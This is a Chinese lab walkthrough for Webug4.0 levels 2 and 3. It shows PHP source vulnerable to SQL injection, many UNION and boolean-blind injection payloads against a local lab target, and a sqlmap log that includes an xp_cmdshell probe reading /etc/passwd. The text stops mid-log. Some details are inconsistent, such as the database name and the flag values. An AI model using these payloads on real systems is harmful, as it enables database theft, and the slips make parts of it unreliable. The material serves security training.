Webug4.0通关笔记02- 第2关布尔注入与第3关延时注入
目录
一、源码分析
1.分析闭合
2.分析输出
(1)查询成功
(2)查询失败
(3)SQL语句执行报错
二、第02关 布尔盲注
1.打开靶场
2.SQL手注(UNION法)
(1)爆flag表
(2)爆env_list表
3.SQL手注(布尔注入)
(1)判断是否存在布尔型注入
(2)获取数据库长度
(3)获取数据库名称
(4)获取当前数据库的表数量
(5)获取当前数据库的表名长度
(6)获取当前数据库的表名
(7)爆env_list列名
(8)爆出env_list的所有字段
4.sqlmap注入
(1)bp抓包保存
(2)sqlmap注入
(3)完整交互
(4)获取flag
三、第03关 延时注入
1.打开靶场
2.SQL手注
(1)盲注漏洞分析
(2)获取数据库长度
(3)获取数据库名称
(4)获取数据库中表名的数量
(5)获取当前数据库的表名长度
(6)获取当前数据库的表名
(7)获取env_list表的列名
(8)获取env_list的所有字段
3.sqlmap渗透
(1)bp抓包保存
(2)sqlmap注入
(3)获取flag
总结
本文通过《Webug4.0通关笔记系列》来进行Webug4.0靶场的渗透实战,本文讲解Webug4.0靶场第2关布尔盲注和第3关时间盲注的渗透实战。
一、源码分析
打开靶场,会发现第02关和第03关的源码相同,均使用bool_injection.php文件
<?phprequire_once "../../common/common.php";
if (!isset($_SESSION['user'])) {header("Location:../login.php");
}if (isset($_GET["id"])) {if (!empty($_GET["id"])) {$sql = "SELECT * FROM sqlinjection WHERE id = '{$_GET['id']}'";$res = $dbConnect->query($sql);}
}
require_once TPMELATE."/bool-injection_1.html";1.分析闭合
SQL语句如下所示
SELECT * FROM sqlinjection WHERE id = '{$_GET['id']}'2.分析输出
相对于第01关,区别就是这一关卡对于SQL查询错误的情况没有进行输出报错信息。
(1)查询成功
这种情况查到了的话,输出实际内容,如下所示
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=1
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=1
当参数id=2时,如下所示
尝试万能注入
(2)查询失败
没查到的话,无报错,显示如下
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=-1http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=-1
(3)SQL语句执行报错
比如说加上单引号等信息,此时SQL语句错误,却也输出同样的内容
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=-1'http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=-1'
综上所述,此注入为不属于严格意义的布尔型注入(虽然错误时无报错,但是正确时却又多种输出),同时仍然可以使用UNION法进行渗透,故而本关卡属于名不副实,不算是布尔注入。
二、第02关 布尔盲注
1.打开靶场
会发现第02关和第03关的源码相同
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=1http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=1
2.SQL手注(UNION法)
当前webug4的docker环境,以及github源码法中的代码中不存在布尔型漏洞,故而只要使用union法即可注入成功
(1)爆flag表
SQL注入的union方法与第01关相同,获取flag表的完整注入的命令如下所示
#万能注入
id=-1' or 1=1%23
#获取列数
id=1' order by 5 %23 #失败
id=1' order by 3 %23 #失败
id=1' order by 2 %23 #成功
#获取回显
id=-1' union select 1, 2 %23
#爆所有数据库
id=-1' union select 1, database() %23
#爆当前数据库
id=-1' union select 1,group_concat(schema_name) from information_schema.schemata %23
#爆当前数据库所有表
id=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='webug' %23
#爆flag表所有列名
id=-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='webug' and table_name='flag'%23
#爆flag表所有字段
id=-1' union select 1,group_concat(id) from flag %23
id=-1' union select 1,group_concat(flag) from flag %23(2)爆env_list表
完整注入参数如下所示
#获取列数
id=1' order by 2%23 #成功
id=1' order by 3%23 #失败
id=1' order by 5%23 #失败
#获取回显
id=-1' union select 1, 2 %23
#爆所有数据库
id=-1' union select 1, database() %23
#爆当前数据库
id=-1' union select 1,group_concat(schema_name) from information_schema.schemata %23
#爆当前数据库所有表
id=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='webug' %23
#爆env_list表所有列名 id,envName,envDesc,envIntegration,delFlag,envFlag,level,type
id=-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='webug' and table_name='env_list'%23
#爆env_list表所有字段
id=-1' union select 1,group_concat(envFlag) from env_list %23获取env_list表中所有内容的过程如下所示
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='webug' and table_name='env_list'%23
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=-1' union select 1,group_concat(envFlag) from env_list %23
如上所示,获取flag如下所示
Flag: fdsafsdfa3.SQL手注(布尔注入)
虽然不是严格的布尔型注入,但是为了应题也可以使用布尔注入法进行手注(说起来有点傻,明明有简单方便的方法,却要用耗时较长比较复杂的布尔型注入法)
(1)判断是否存在布尔型注入
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=1
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=1' and 1=1 %23
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=1' and 1=2 %23
如上所示and 1=1时与正常闭合时输出一样,而and 1=2时无输出,故而存在布尔型注入
(2)获取数据库长度
?id=1' and length(database())>1%23 #成功
?id=1' and length(database())>2%23 #成功
?id=1' and length(database())>3%23 #成功
?id=1' and length(database())>4%23 #成功
?id=1' and length(database())>5%23 #失败如下所示,数据库的长度为5
(3)获取数据库名称
可以使用半自动的方法渗透(如bp或者python方法),下为成功渗透的注入语句
?id=1' and substr(database(),1,1)='w'%23
?id=1' and substr(database(),2,1)='e'%23
?id=1' and substr(database(),3,1)='b'%23
?id=1' and substr(database(),4,1)='u'%23
?id=1' and substr(database(),5,1)='g'%23
如上所示,爆出数据库的名称为webug
(4)获取当前数据库的表数量
如下所示,首先获取数据库中有多少个表
id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=1 %23
id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 %23
id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=3 %23
id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=4 %23
id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=5 %23
id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=6 %23
id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=7 %23 #成功如下所示websec数据库共有7个表
(5)获取当前数据库的表名长度
猜测第一个表的长度
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=1%23
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=2%23
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=3%23
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=4%23
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=5%23
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=6%23
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=7%23
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=8%23
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=9%23 成功 
以此类推,求第二个表格的长度,可知为8
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=1%23
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=2%23
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=3%23
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=4%23
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=5%23
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=6%23
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=7%23
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=8%23成功
以此类推, 可以求的websec数据库的每个表长度,分别9、8、8、4·、12、4、9
(6)获取当前数据库的表名
爆第一个表的表名,为data_crud
id=1' and (substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))='d'%23
id=1' and (substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))='a'%23
id=1' and (substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))='t'%23
id=1' and (substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))='a'%23
id=1' and (substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),5,1))='_'%23
id=1' and (substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),6,1))='c'%23
id=1' and (substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),7,1))='r'%23
id=1' and (substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),8,1))='u'%23
id=1' and (substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),9,1))='d'%23爆第二表的表名,为env_list
id=1' and (substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))='e'%23
id=1' and (substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))='n'%23
id=1' and (substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))='v'%23
id=1' and (substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))='_'%23
id=1' and (substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),5,1))='l'%23
id=1' and (substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),6,1))='i'%23
id=1' and (substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),7,1))='s'%23
id=1' and (substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),8,1))='t'%23以此类推,所有表名分别为
data_crud,env_list,env_path,flag,sqlinjection,user,user_test
(7)爆env_list列名
接下来是爆列名和字段名,均需要先爆长度再挨个字段判断
如下所示第一列长度为2
id=1' and (select length(column_name) from information_schema.COLUMNS where TABLE_NAME='env_list' limit 0,1) =1%23
id=1' and (select length(column_name) from information_schema.COLUMNS where TABLE_NAME='env_list' limit 0,1) =2%23
获取第一列名称
id=1' and mid((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME ='env_list' limit 0,1),1,1)='i'%23
id=1' and mid((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME ='env_list' limit 0,1),2,1)='d'%23如下所示,第一列的列名为id
以此类推,可以获取所有列的名称,分别为id,envName,envDesc,envIntegration,delFlag,envFlag,level,type
(8)爆出env_list的所有字段
首先爆出第一个字段的长度为16
id=1' and length(substr((select envFlag from env_list limit 0,1),1))=1%23
id=1' and length(substr((select envFlag from env_list limit 0,1),1))=2%23
id=1' and length(substr((select envFlag from env_list limit 0,1),1))=3%23
id=1' and length(substr((select envFlag from env_list limit 0,1),1))=4%23
id=1' and length(substr((select envFlag from env_list limit 0,1),1))=5%23
id=1' and length(substr((select envFlag from env_list limit 0,1),1))=6%23
id=1' and length(substr((select envFlag from env_list limit 0,1),1))=7%23
id=1' and length(substr((select envFlag from env_list limit 0,1),1))=8%23
id=1' and length(substr((select envFlag from env_list limit 0,1),1))=9%23
id=1' and length(substr((select envFlag from env_list limit 0,1),1))=10%23
id=1' and length(substr((select envFlag from env_list limit 0,1),1))=11%23
id=1' and length(substr((select envFlag from env_list limit 0,1),1))=12%23
id=1' and length(substr((select envFlag from env_list limit 0,1),1))=13%23
id=1' and length(substr((select envFlag from env_list limit 0,1),1))=14%23
id=1' and length(substr((select envFlag from env_list limit 0,1),1))=15%23
id=1' and length(substr((select envFlag from env_list limit 0,1),1))=16%23接下来爆第一个字段的名称,如下所示为dfafdasfafdsadfa
id=1' and (substr((select flag from flag limit 0,1),1,1))='d'%23
id=1' and (substr((select flag from flag limit 0,1),2,1))='f'%23
id=1' and (substr((select flag from flag limit 0,1),3,1))='a'%23
id=1' and (substr((select flag from flag limit 0,1),4,1))='f'%23
id=1' and (substr((select flag from flag limit 0,1),5,1))='d'%23
id=1' and (substr((select flag from flag limit 0,1),6,1))='a'%23
id=1' and (substr((select flag from flag limit 0,1),7,1))='s'%23
id=1' and (substr((select flag from flag limit 0,1),8,1))='f'%23
id=1' and (substr((select flag from flag limit 0,1),9,1))='a'%23
id=1' and (substr((select flag from flag limit 0,1),10,1))='f'%23
id=1' and (substr((select flag from flag limit 0,1),11,1))='d'%23
id=1' and (substr((select flag from flag limit 0,1),12,1))='s'%23
id=1' and (substr((select flag from flag limit 0,1),13,1))='a'%23
id=1' and (substr((select flag from flag limit 0,1),14,1))='d'%23
id=1' and (substr((select flag from flag limit 0,1),15,1))='f'%23
id=1' and (substr((select flag from flag limit 0,1),16,1))='a'%23以此类推,可以爆出所有如下字段
从而得到布尔型关卡这一关的flag为fdsafsdfa
4.sqlmap注入
(1)bp抓包保存
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=1http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=1bp抓包并将报文保存为webug02.txt
(2)sqlmap注入
sqlmap -r webug02.txt --current-db --dump --batch 如下所示找到注入点
(3)完整交互
kali@kali:~/Desktop/liujiannan/liujiannan$ sqlmap -r webug02.txt --current-db --dump --batch -v 3_____H_____ ___[)]_____ ___ ___ {1.5.11#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _||_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 22:40:26 /2022-11-29/[22:40:26] [INFO] parsing HTTP request from 'webug02.txt'
[22:40:26] [DEBUG] not a valid WebScarab log data
[22:40:26] [DEBUG] cleaning up configuration parameters
[22:40:26] [DEBUG] setting the HTTP timeout
[22:40:26] [DEBUG] setting the HTTP User-Agent header
[22:40:26] [DEBUG] creating HTTP requests opener object
[22:40:26] [INFO] testing connection to the target URL
[22:40:26] [DEBUG] declared web page charset 'utf-8'
[22:40:26] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:40:26] [PAYLOAD] 4322 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
[22:40:26] [INFO] testing if the target URL content is stable
[22:40:27] [INFO] target URL content is stable
[22:40:27] [INFO] testing if GET parameter 'id' is dynamic
[22:40:27] [PAYLOAD] 4155
[22:40:27] [WARNING] GET parameter 'id' does not appear to be dynamic
[22:40:27] [PAYLOAD] 1().".()',,
[22:40:27] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[22:40:27] [PAYLOAD] 1'WAMCul<'">RwjObs
[22:40:27] [INFO] testing for SQL injection on GET parameter 'id'
[22:40:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:40:27] [PAYLOAD] 1) AND 4787=4978 AND (3860=3860
[22:40:27] [PAYLOAD] 1) AND 3815=3815 AND (6250=6250
[22:40:27] [PAYLOAD] 1 AND 4481=1070
[22:40:28] [PAYLOAD] 1 AND 3815=3815
[22:40:28] [PAYLOAD] 1 AND 9606=2201-- SNnJ
[22:40:28] [PAYLOAD] 1 AND 3815=3815-- OXCM
[22:40:28] [PAYLOAD] 1') AND 3902=1379 AND ('SPHF'='SPHF
[22:40:28] [PAYLOAD] 1') AND 3815=3815 AND ('ulnM'='ulnM
[22:40:28] [PAYLOAD] 1' AND 1996=3967 AND 'vurv'='vurv
[22:40:28] [PAYLOAD] 1' AND 3815=3815 AND 'Yioj'='Yioj
[22:40:28] [PAYLOAD] 1' AND 6716=1578 AND 'hgzQ'='hgzQ
[22:40:28] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (NOT)' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' because the level (2) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (comment)' because the level (2) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (comment)' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' because the level (2) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)' because the level (5) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' because the level (2) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the level (2) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the risk (3) is higher than the provided (1)
[22:40:28] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[22:40:28] [PAYLOAD] (SELECT (CASE WHEN (8852=7541) THEN 1 ELSE (SELECT 7541 UNION SELECT 4591) END))
[22:40:28] [PAYLOAD] (SELECT (CASE WHEN (5591=5591) THEN 1 ELSE (SELECT 8712 UNION SELECT 9462) END))
[22:40:28] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (MAKE_SET)' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)' because the level (5) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (ELT)' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (ELT - original value)' because the level (5) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (bool*int)' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (bool*int - original value)' because the level (5) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace (original value)' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)' because the level (5) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)' because the level (5) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter replace' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter replace (original value)' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Informix boolean-based blind - Parameter replace' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Informix boolean-based blind - Parameter replace (original value)' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Microsoft Access boolean-based blind - Parameter replace' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Microsoft Access boolean-based blind - Parameter replace (original value)' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (DUAL)' because the level (2) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (DUAL - original value)' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (CASE)' because the level (2) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (CASE - original value)' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause' because the level (2) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause' because the level (2) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'PostgreSQL boolean-based blind - ORDER BY clause (original value)' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)' because the level (5) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY, GROUP BY clause' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the level (5) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the level (5) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'IBM DB2 boolean-based blind - ORDER BY clause' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'IBM DB2 boolean-based blind - ORDER BY clause (original value)' because the level (5) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'HAVING boolean-based blind - WHERE, GROUP BY clause' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - Stacked queries' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - Stacked queries' because the level (5) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Stacked queries' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)' because the level (5) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Oracle boolean-based blind - Stacked queries' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'Microsoft Access boolean-based blind - Stacked queries' because the level (5) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'SAP MaxDB boolean-based blind - Stacked queries' because the level (5) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' because the level (4) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' because the level (5) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' because the level (2) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' because the risk (3) is higher than the provided (1)
[22:40:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:40:28] [PAYLOAD] 1) AND EXTRACTVALUE(7451,CONCAT(0x5c,0x71767a7871,(SELECT (ELT(7451=7451,1))),0x716a786a71)) AND (9105=9105
[22:40:28] [PAYLOAD] 1 AND EXTRACTVALUE(7451,CONCAT(0x5c,0x71767a7871,(SELECT (ELT(7451=7451,1))),0x716a786a71))
[22:40:28] [PAYLOAD] 1 AND EXTRACTVALUE(7451,CONCAT(0x5c,0x71767a7871,(SELECT (ELT(7451=7451,1))),0x716a786a71))-- Tmms
[22:40:28] [PAYLOAD] 1') AND EXTRACTVALUE(7451,CONCAT(0x5c,0x71767a7871,(SELECT (ELT(7451=7451,1))),0x716a786a71)) AND ('kfmW'='kfmW
[22:40:28] [PAYLOAD] 1' AND EXTRACTVALUE(7451,CONCAT(0x5c,0x71767a7871,(SELECT (ELT(7451=7451,1))),0x716a786a71)) AND 'IwNQ'='IwNQ
[22:40:28] [DEBUG] skipping test 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' because the level (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)' because the risk (3) is higher than the provided (1)
[22:40:28] [DEBUG] skipping test 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)' because the risk (3) is higher than the provided (1)
[22:40:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
